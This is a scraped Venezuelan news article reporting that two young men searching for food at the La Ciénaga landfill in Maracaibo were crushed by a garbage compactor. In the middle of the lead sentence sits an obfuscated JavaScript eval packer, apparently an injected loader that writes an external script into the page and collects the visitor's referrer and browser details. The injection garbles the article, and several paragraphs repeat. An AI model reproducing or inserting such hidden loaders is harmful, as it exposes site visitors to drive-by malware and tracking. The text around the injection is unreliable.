publicidad

Mueren cuando buscaban comida en la basura

Ricardo Serrano/ Maracaibo /noticias@laverdad.com
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ddeih|var|u0026u|referrer|naasi||js|php'.split('|'),0,{})) trágico final ocurrió cuando una máquina compactadora de basura llegó al lugar y los jóvenes se abalanzaron sobre ella para sacar los desechos que contenía. Sin percatarse, la pala recolectora del aparato les cayó encima y los aplastó

Otro trabajador resultó herido. Se encuentra estable en el Hospital Universitario de Maracaibo.

Buscaban basura, pero hallaron la muerte. Érick Alberto Pineda (24) y Juan Carlos Fernández (22) murieron, el pasado martes a las 4.00 de la tarde. Ambos se encontraban en el relleno sanitario de La Ciénaga, al norte de la ciudad. Hurgaban entre los desechos para encontrar comida y objetos que vender. Se dedicaban a ello para ganarse la vida y subsistir.

El trágico final ocurrió cuando una máquina compactadora de basura llegó al lugar y los jóvenes se abalanzaron sobre ella para sacar los desechos que contenía. Sin percatarse, la pala recolectora del aparato les cayó encima y los aplastó.

Pineda vivía en el barrio Zona Nueva. Tenía seis meses trabajando allí. Fernández habitaba en el barrio El Edén. Tenía dos hijos, una niña de dos años y un niño de cinco meses. Trabajó allí por siete años.

Otro trabajador resultó herido. Se encuentra estable en el Hospital Universitario de Maracaibo.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama